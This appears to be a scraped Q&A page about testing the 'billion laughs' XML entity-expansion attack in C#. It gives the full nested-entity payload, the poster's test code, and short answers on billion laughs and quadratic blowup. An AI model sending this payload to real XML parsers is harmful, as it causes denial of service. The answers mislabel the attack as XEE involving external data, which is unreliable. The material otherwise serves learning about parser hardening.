Menu
I am trying to test the XML code from an MSDN magazine page where it says that the following lines of code will cause an increase of memory usage up to 3GB when processing.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
When I tried to paste that text into an xml file in Visual Studio it indeed showed a increase in memory and also in CPU usage. However when I tried to put it in a text file, instead of an XML file and load it using c#, it didn't have any impact.
Update: I thought the LoadXml method was supposed to have an impact, but I guess that is not the processing part. When I tried to get the first child it (i.e. c#) threw an exception telling that MaxCharactersFromEntities was exceeded.
Update: here is my code as well:
using System;
using System.Xml;
namespace BillionLaughsAttack
{
class Program
{
//The file containing the billion laughs mentioned previously
//a txt file: Since an xml file causes visual studio to parse
static String xmlFileLocation = "./MyData/DeepXML.txt";
static void Main(string[] args)
{
String xmlContent = null;
System.IO.StreamReader sr;
System.Xml.XmlDocument document = new XmlDocument();
try
{
sr = new System.IO.StreamReader(xmlFileLocation);
xmlContent = sr.ReadToEnd();
//Load xml containing Billion Laughs Attack (this won't do anything!)
document.LoadXml(xmlContent);
//Proces xml by getting first child (this will cause an exception!)
String val = document.FirstChild.Value;
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
}
}
591
The billion laughs attack described above can take an exponential amount of space or time. The quadratic blowup variation causes quadratic growth in resource requirements by simply repeating a large entity over and over again, to avoid countermeasures that detect heavily nested entities.
An XEE attack is a type of an application attack. It's also called a billion laughs attack or an XML bombs attack. The essence of this attack is that an insecurely configured XML parser processes external data. As a result of this attack, you may get denial of service (DoS).
"An XML quadratic blowup attack is similar to a Billion Laughs attack. Essentially, it exploits the use of entity expansion. Instead of deferring to the use of nested entities, it replicates one large entity using a couple thousand characters repeatedly.
This attack exploits a vulnerable XML feature.
Running it through an XML parser will recursively expand the entities and occupy a large amount of memory.
Reading it as plain text won't do anything at all.
55
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
